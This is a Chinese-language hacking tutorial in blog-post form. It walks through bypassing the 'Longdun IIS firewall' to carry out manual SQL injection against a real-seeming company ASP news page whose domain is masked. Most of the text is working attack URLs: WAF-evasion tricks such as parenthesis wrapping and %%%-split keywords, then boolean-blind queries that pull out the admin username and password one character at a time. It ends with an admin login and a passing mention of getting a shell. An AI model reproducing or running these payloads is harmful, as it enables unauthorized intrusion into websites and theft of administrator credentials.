小方法“绕过龙盾防火墙”

今天的技术主要是结合网上的和自己的想法思路绕过”龙盾IIS防火墙“其他防火墙没试过

好的废话不多说实战开始，
手工注入，工具是不行啦，
第一咱先判断是否有注入点
http://***.com/newsShow.asp?ArticleID=120 ’
http://***.com/newsShow.asp?ArticleID=120 and 1=1
http://***.com/newsShow.asp?ArticleID=120 and 1=2
一直提示 “龙盾IIS防火墙”提示：请不要提交非法信息或恶意访问
我想这个大家应该都不陌生，现在国内用这个的防火墙还挺多的，我看网上资料也比较少呵呵
自己研究了一下
成功突破~

http://***.com/newsShow.asp?ArticleID=(120)%20and%20(%201=1%20) 返回正常
http://***.com/newsShow.asp?ArticleID=(120)%20and%20(%201=2%20) 返回错误
呵呵，看来已经成功突破防火墙的限制啦~哈哈~
继续踩解吧~
http://***.com/newsShow.asp?ArticleID=(120) and ex%%%ists (sele%%%ct * from admin)
呵呵返回成功，存在admin表，应该是个access的~是一个公司网站，估计也是access的呵呵
http://***.com/newsShow.asp?ArticleID=(120) and ex%%%ists (sele%%%ct username from admin)
呵呵返回成功，存在username表
http://***.com/newsShow.asp?ArticleID=(120) and ex%%%ists (sele%%%ct password from admin)
呵呵返回成功，存在password表
继续往下踩解吧~走吧，
http://***.com/newsShow.asp?ArticleID=(120) order by 1
http://***.com/newsShow.asp?ArticleID=(120) order by 1 order by 1
一直返回错误看来 order 是用不了了，没办法只有一个一个的去踩解啦~

先看看管理员用户名有几位吧~
http://***.com/newsShow.asp?ArticleID=(120) and ex%%%ists(sele%%%ct username from admin where len(username)=5)
一切正常呵呵，不错 RP挺好~
http://***.com/newsShow.asp?ArticleID=(120) and ex%%%ists (sele%%%ct id from admin where asc(mid(username,1))=120)
http://***.com/newsShow.asp?ArticleID=(120) and ex%%%ists (sele%%%ct id from admin where asc(mid(username,2))=50)
http://***.com/newsShow.asp?ArticleID=(120) and ex%%%ists (sele%%%ct id from admin where asc(mid(username,3))=99)
http://***.com/newsShow.asp?ArticleID=(120) and ex%%%ists (sele%%%ct id from admin where asc(mid(username,4))=51)
http://***.com/newsShow.asp?ArticleID=(120) and ex%%%ists (sele%%%ct id from admin where asc(mid(username,5))=109)
账号都出来了，用计算器转化了下
帐号就是:x2c3m
后面猜解密码~~
http://***.com/newsShow.asp?ArticleID=(120) and ex%%%ists(sele%%%ct password from admin where len(password)=8) 密码一共有8位数

http://***.com/newsShow.asp?ArticleID=(120) and ex%%%ists (sele%%%ct id from admin where asc(mid(password,1))=98)
http://***.com/newsShow.asp?ArticleID=(120) and ex%%%ists (sele%%%ct id from admin where asc(mid(password,2))=105)
http://***.com/newsShow.asp?ArticleID=(120) and ex%%%ists (sele%%%ct id from admin where asc(mid(password,3))=111)
http://***.com/newsShow.asp?ArticleID=(120) and ex%%%ists (sele%%%ct id from admin where asc(mid(password,4))=115)
http://***.com/newsShow.asp?ArticleID=(120) and ex%%%ists (sele%%%ct id from admin where asc(mid(password,5))=108)
http://***.com/newsShow.asp?ArticleID=(120) and ex%%%ists (sele%%%ct id from admin where asc(mid(password,6))=111)
http://***.com/newsShow.asp?ArticleID=(120) and ex%%%ists (sele%%%ct id from admin where asc(mid(password,7))=97)
http://***.com/newsShow.asp?ArticleID=(120) and ex%%%ists (sele%%%ct id from admin where asc(mid(password,8))=100)
密码:b***ad
直接去后台登陆，成功搞定，shell比较简单就不做介绍啦~~

现在的防火墙越来越多，希望与大家多多交流绕过防火墙的技术，有高人有好的方法请留贴....

文章目录